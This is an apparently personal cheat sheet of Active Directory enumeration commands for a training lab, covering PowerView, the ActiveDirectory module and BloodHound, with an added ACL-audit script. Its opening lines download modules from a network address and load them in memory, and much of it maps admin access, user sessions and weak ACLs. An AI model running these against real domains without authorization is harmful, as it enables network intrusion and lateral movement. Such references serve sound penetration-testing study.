AD Enumeration

Loading the ActiveDirectory module and PowerView:

C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\<Version>
Import-Module ([System.Reflection.Assembly]::Load((Invoke-WebRequest -Uri "http://192.0.0.3/Microsoft.ActiveDirectory.Management.dll").content))
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ActiveDirectory
New-Module -Name "Your Module Name" -ScriptBlock ([Scriptblock]::Create((New-Object System.Net.WebClient).DownloadString("http://192.0.0.3/ActiveDirectory.psd1")))
. <PATH>/Powerview.ps1

Domain Enumeration:

A) Using Domain Class-

$ADclass=[System.Directoryservices.activeDirectory.Domain]
$ADclass::GetCurrentDomain()

B) Powerview-

PowerView implements the same thing but offers many more options, as shown below.

Get-Domain
Get-Domain -Domain eurocorp.local
(Get-DomainPolicyData).SystemAccess
(Get-DomainPolicyData -Domain eurocorp.local).SystemAccess
(Get-DomainPolicyData).KerberosPolicy
Get-DomainController
(Get-DomainController).Partitions
Get-DomainUser
Get-DomainUser | Select-Object samaccountname
Get-DomainUser -Identity student479
Get-DomainUser -Identity student1 -Properties *
Get-DomainUser -Properties samaccountname,logonCount | Select-Object -First 2
Get-DomainUser -LDAPFilter "Description=*built*" | Select-Object name,Description
Get-DomainComputer | Select-Object -First 2
Get-DomainComputer -OperatingSystem "*Server 2016*"
Get-DomainGroup | Select-Object -First 2
Get-DomainGroup | Select-Object Name
Get-DomainGroup *admin* | Select-Object name
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroup -UserName "student479"
Get-DomainGroup -UserName "student479" | Select-Object name
Get-DomainGroup *admin* -Domain moneycorp.local | Select-Object samaccountname
Invoke-ShareFinder -Verbose
Invoke-FileFinder -Verbose
Get-DomainGPO | Select-Object -First 1
Get-DomainGPOLocalGroup
Get-DomainOU
Get-DomainGPO -Identity "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"
Get-DomainOU | Where-Object name -eq "StudentMachines" | Select-Object distinguishedname
Get-DomainOU | Where-Object name -eq "StudentMachines" | Select-Object distinguishedname | ForEach-Object {Get-DomainComputer -SearchBase $_.distinguishedname} | Select-Object name
OR
Get-DomainComputer -SearchBase $((Get-DomainOU -Identity "StudentMachines").distinguishedname)
OR
$obj=(Get-DomainOU -Identity "StudentMachines").distinguishedname ; Get-DomainComputer -SearchBase $obj
Get-DomainObjectAcl -SamAccountName student479 -ResolveGUIDs
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl -ResolveGUIDs
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"
Get-DomainTrust
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local
Get-Forest
Get-Forest -Forest eurocorp.local
Get-ForestDomain
Get-ForestDomain -Forest eurocorp.local
Find-LocalAdminAccess -Verbose
Find-PSRemotingLocalAdminAccess
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -CheckAccess
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"
C) ActiveDirectory Module-

Get-ADDomain
Get-ADDomain -Identity moneycorp.local
Get-ADDomainController
Get-ADDomainController -DomainName moneycorp.local -Discover
Get-ADUser -Filter * -Properties * | Select-Object -First 2
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | Select-Object name,Description
Get-ADComputer -Filter * | Select-Object -first 1
Get-ADComputer -Filter * -Properties * | Select-Object -first 1
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | Select-Object Name,OperatingSystem
Get-ADComputer -Filter * | Select-Object DNSHostName | ForEach-Object {Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADGroup -Filter * | Select-Object Name
Get-ADGroup -Filter * -Properties * | Select-Object -first 1
Get-ADGroup -Filter 'Name -like "*admin*"' | Select-Object Name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity student479
Get-ADOrganizationalUnit -Filter * -Properties *
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access
Get-ADTrust -Filter *
Get-ADTrust -Identity us.dollarcorp.moneycorp.local
Get-ADForest
Get-ADForest -Identity eurocorp.local
(Get-ADForest).Domains
Get-ADForest | Select-Object -ExpandProperty GlobalCatalogs
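The raw `(Get-Acl 'AD:\...').Access` output above is hard to read on a real domain; the following is an added example (not from the original post) that turns it into an audit of which trustees hold takeover-level rights on a sensitive object. The target DN, the allow-list of expected trustees and the function name are assumptions for the lab domain used in this cheat sheet.

```powershell
# Added example, not part of the original post: list non-default trustees that hold
# modify-level rights on an AD object, using the RSAT ActiveDirectory module's AD: drive.
Import-Module ActiveDirectory

function Get-RiskyAce {
    param(
        # Assumed lab object; replace with any DN you want to audit.
        [string]$TargetDN = 'CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
    )
    # Rights that let a trustee change the object, its DACL or its owner.
    $riskyRights = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'ExtendedRight'
    # Trustees expected to hold such rights by default (assumed allow-list); anything else is flagged.
    $expected = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
                  'Domain Admins', 'Enterprise Admins')

    $acl = Get-Acl -Path ("AD:\" + $TargetDN)
    foreach ($ace in $acl.Access) {
        # Deny ACEs reduce access; only Allow ACEs grant it.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # ActiveDirectoryRights is a flags enum; split "CreateChild, WriteDacl" into parts.
        $rights = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
        $hit = @($rights | Where-Object { $riskyRights -contains $_ })
        if ($hit.Count -eq 0) { continue }

        $who = $ace.IdentityReference.Value
        if ($expected | Where-Object { $who -like "*$_" }) { continue }

        # ObjectType of all zeros means the right applies to the whole object, not one
        # attribute or extended right; a specific GUID narrows what the trustee can change.
        $scope = if ($ace.ObjectType -eq [guid]::Empty) { 'whole object' } else { $ace.ObjectType }
        [pscustomobject]@{
            Object    = $TargetDN
            Trustee   = $who
            Rights    = ($hit -join ',')
            Scope     = $scope
            Inherited = $ace.IsInherited
        }
    }
}

Get-RiskyAce | Format-Table -AutoSize
```

Objects protected by AdminSDHolder (such as Domain Admins) have their DACL reset by the SDProp process, so a flagged ACE on one of them usually points to a change made on AdminSDHolder itself rather than on the group.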

D) Bloodhound-

i) Download and extract the tool from here- https://github.com/BloodHoundAD/BloodHound/releases

apt install bloodhound -y
apt install neo4j -y
neo4j start
./BloodHound --no-sandbox
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose
OR
.\SharpHound.exe -c all

n00🔑
Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/